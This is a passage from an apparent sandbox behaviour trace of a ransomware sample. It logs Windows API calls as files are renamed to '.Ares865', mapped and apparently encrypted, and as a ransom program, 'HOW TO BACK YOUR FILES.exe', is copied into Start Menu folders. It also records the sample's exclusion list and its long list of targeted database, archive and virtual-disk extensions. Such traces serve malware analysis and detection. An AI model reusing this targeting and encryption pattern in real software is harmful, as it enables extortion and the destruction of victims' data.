Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.ares865"), dwFlags=0x1) returned 1 [0058.587] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.588] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1306) returned 1 [0058.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0058.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.588] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.589] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.589] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.589] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x120 [0058.593] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x190000 [0058.603] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.604] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.604] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0058.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0058.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.604] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.604] CloseHandle (hObject=0x120) returned 1 [0058.604] CloseHandle (hObject=0x15c) returned 1 [0058.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.606] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d3d87bb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 0 [0058.606] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0058.606] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2388 [0058.606] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility" [0058.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0058.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0058.606] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned 67 [0058.606] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility" [0058.606] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.606] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.607] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0058.607] GetLastError () returned 0x0 [0058.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.607] ReadFile (in: hFile=0x164, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.607] CloseHandle (hObject=0x164) returned 1 [0058.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.607] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.607] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e30880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e30880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.608] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.608] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.608] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.608] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e30880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e30880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.608] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.608] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.608] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.608] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.608] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec0cd7f5, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0058.608] lstrlenW (lpString="Desktop.ini") returned 11 [0058.608] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\*") returned 69 [0058.608] lstrcpyW (in: lpString1=0x2cce488, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0058.608] lstrlenW (lpString="Desktop.ini") returned 11 [0058.608] lstrlenW (lpString="Ares865") returned 7 [0058.608] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0058.608] lstrlenW (lpString=".dll") returned 4 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0058.608] lstrlenW (lpString=".lnk") returned 4 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0058.608] lstrlenW (lpString=".ini") returned 4 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0058.608] lstrlenW (lpString=".sys") returned 4 [0058.608] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0058.609] lstrlenW (lpString="Desktop.ini") returned 11 [0058.609] lstrlenW (lpString="bak") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0058.609] lstrlenW (lpString="ba_") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0058.609] lstrlenW (lpString="dbb") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0058.609] lstrlenW (lpString="vmdk") returned 4 [0058.609] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0058.609] lstrlenW (lpString="rar") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0058.609] lstrlenW (lpString="zip") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0058.609] lstrlenW (lpString="tgz") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0058.609] lstrlenW (lpString="vbox") returned 4 [0058.609] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0058.609] lstrlenW (lpString="vdi") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0058.609] lstrlenW (lpString="vhd") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0058.609] lstrlenW (lpString="vhdx") returned 4 [0058.609] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0058.609] lstrlenW (lpString="avhd") returned 4 [0058.609] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0058.609] lstrlenW (lpString="db") returned 2 [0058.609] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0058.609] lstrlenW (lpString="db2") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0058.609] lstrlenW (lpString="db3") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0058.609] lstrlenW (lpString="dbf") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0058.609] lstrlenW (lpString="mdf") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0058.609] lstrlenW (lpString="mdb") returned 3 [0058.609] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0058.609] lstrlenW (lpString="sql") returned 3 [0058.610] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0058.610] lstrlenW (lpString="sqlite") returned 6 [0058.610] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0058.610] lstrlenW (lpString="sqlite3") returned 7 [0058.610] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0058.610] lstrlenW (lpString="sqlitedb") returned 8 [0058.610] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0058.610] lstrlenW (lpString="xml") returned 3 [0058.610] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0058.610] lstrlenW (lpString="$er") returned 3 [0058.610] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0058.610] lstrlenW (lpString="4dd") returned 3 [0058.610] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0058.610] lstrlenW (lpString="4dl") returned 3 [0058.610] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0058.610] lstrlenW (lpString="^^^") returned 3 [0058.610] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0058.610] lstrlenW (lpString="abs") returned 3 [0058.610] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0058.610] lstrlenW (lpString="abx") returned 3 [0058.610] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0058.610] lstrlenW (lpString="accdb") returned 5 [0058.610] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0058.610] lstrlenW (lpString="accdc") returned 5 [0058.610] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0058.610] lstrlenW (lpString="accde") returned 5 [0058.610] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0058.610] lstrlenW (lpString="accdr") returned 5 [0058.610] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0058.610] lstrlenW (lpString="accdt") returned 5 [0058.610] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0058.610] lstrlenW (lpString="accdw") returned 5 [0058.610] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0058.610] lstrlenW (lpString="accft") returned 5 [0058.610] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0058.610] lstrlenW (lpString="adb") returned 3 [0058.610] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.611] lstrlenW (lpString="adb") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.611] lstrlenW (lpString="ade") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0058.611] lstrlenW (lpString="adf") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0058.611] lstrlenW (lpString="adn") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0058.611] lstrlenW (lpString="adp") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0058.611] lstrlenW (lpString="alf") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0058.611] lstrlenW (lpString="ask") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0058.611] lstrlenW (lpString="btr") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0058.611] lstrlenW (lpString="cat") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0058.611] lstrlenW (lpString="cdb") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0058.611] lstrlenW (lpString="ckp") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0058.611] lstrlenW (lpString="cma") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0058.611] lstrlenW (lpString="cpd") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0058.611] lstrlenW (lpString="dacpac") returned 6 [0058.611] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0058.611] lstrlenW (lpString="dad") returned 3 [0058.611] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0058.611] lstrlenW (lpString="dadiagrams") returned 10 [0058.611] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0058.611] lstrlenW (lpString="daschema") returned 8 [0058.611] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0058.611] lstrlenW (lpString="db-journal") returned 10 [0058.611] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0058.611] lstrlenW (lpString="db-shm") returned 6 [0058.612] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0058.612] lstrlenW (lpString="db-wal") returned 6 [0058.612] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0058.612] lstrlenW (lpString="dbc") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0058.612] lstrlenW (lpString="dbs") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0058.612] lstrlenW (lpString="dbt") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0058.612] lstrlenW (lpString="dbv") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0058.612] lstrlenW (lpString="dbx") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0058.612] lstrlenW (lpString="dcb") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0058.612] lstrlenW (lpString="dct") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0058.612] lstrlenW (lpString="dcx") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0058.612] lstrlenW (lpString="ddl") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0058.612] lstrlenW (lpString="dlis") returned 4 [0058.612] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0058.612] lstrlenW (lpString="dp1") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0058.612] lstrlenW (lpString="dqy") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0058.612] lstrlenW (lpString="dsk") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0058.612] lstrlenW (lpString="dsn") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0058.612] lstrlenW (lpString="dtsx") returned 4 [0058.612] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0058.612] lstrlenW (lpString="dxl") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0058.612] lstrlenW (lpString="eco") returned 3 [0058.612] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0058.612] lstrlenW (lpString="ecx") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0058.613] lstrlenW (lpString="edb") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0058.613] lstrlenW (lpString="epim") returned 4 [0058.613] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0058.613] lstrlenW (lpString="fcd") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0058.613] lstrlenW (lpString="fdb") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0058.613] lstrlenW (lpString="fic") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0058.613] lstrlenW (lpString="flexolibrary") returned 12 [0058.613] lstrlenW (lpString="fm5") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0058.613] lstrlenW (lpString="fmp") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0058.613] lstrlenW (lpString="fmp12") returned 5 [0058.613] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0058.613] lstrlenW (lpString="fmpsl") returned 5 [0058.613] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0058.613] lstrlenW (lpString="fol") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0058.613] lstrlenW (lpString="fp3") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0058.613] lstrlenW (lpString="fp4") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0058.613] lstrlenW (lpString="fp5") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0058.613] lstrlenW (lpString="fp7") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0058.613] lstrlenW (lpString="fpt") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0058.613] lstrlenW (lpString="frm") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0058.613] lstrlenW (lpString="gdb") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.613] lstrlenW (lpString="gdb") returned 3 [0058.613] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.613] lstrlenW (lpString="grdb") returned 4 [0058.614] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0058.614] lstrlenW (lpString="gwi") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0058.614] lstrlenW (lpString="hdb") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0058.614] lstrlenW (lpString="his") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0058.614] lstrlenW (lpString="ib") returned 2 [0058.614] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0058.614] lstrlenW (lpString="idb") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0058.614] lstrlenW (lpString="ihx") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0058.614] lstrlenW (lpString="itdb") returned 4 [0058.614] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0058.614] lstrlenW (lpString="itw") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0058.614] lstrlenW (lpString="jet") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0058.614] lstrlenW (lpString="jtx") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0058.614] lstrlenW (lpString="kdb") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0058.614] lstrlenW (lpString="kexi") returned 4 [0058.614] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0058.614] lstrlenW (lpString="kexic") returned 5 [0058.614] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0058.614] lstrlenW (lpString="kexis") returned 5 [0058.614] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0058.614] lstrlenW (lpString="lgc") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0058.614] lstrlenW (lpString="lwx") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0058.614] lstrlenW (lpString="maf") returned 3 [0058.614] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0058.614] lstrlenW (lpString="maq") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0058.615] lstrlenW (lpString="mar") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0058.615] lstrlenW (lpString="marshal") returned 7 [0058.615] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0058.615] lstrlenW (lpString="mas") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0058.615] lstrlenW (lpString="mav") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0058.615] lstrlenW (lpString="maw") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0058.615] lstrlenW (lpString="mdbhtml") returned 7 [0058.615] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0058.615] lstrlenW (lpString="mdn") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0058.615] lstrlenW (lpString="mdt") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0058.615] lstrlenW (lpString="mfd") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0058.615] lstrlenW (lpString="mpd") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0058.615] lstrlenW (lpString="mrg") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0058.615] lstrlenW (lpString="mud") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0058.615] lstrlenW (lpString="mwb") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0058.615] lstrlenW (lpString="myd") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0058.615] lstrlenW (lpString="ndf") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0058.615] lstrlenW (lpString="nnt") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0058.615] lstrlenW (lpString="nrmlib") returned 6 [0058.615] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0058.615] lstrlenW (lpString="ns2") returned 3 [0058.615] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0058.615] lstrlenW (lpString="ns3") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0058.616] lstrlenW (lpString="ns4") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0058.616] lstrlenW (lpString="nsf") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0058.616] lstrlenW (lpString="nv") returned 2 [0058.616] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0058.616] lstrlenW (lpString="nv2") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0058.616] lstrlenW 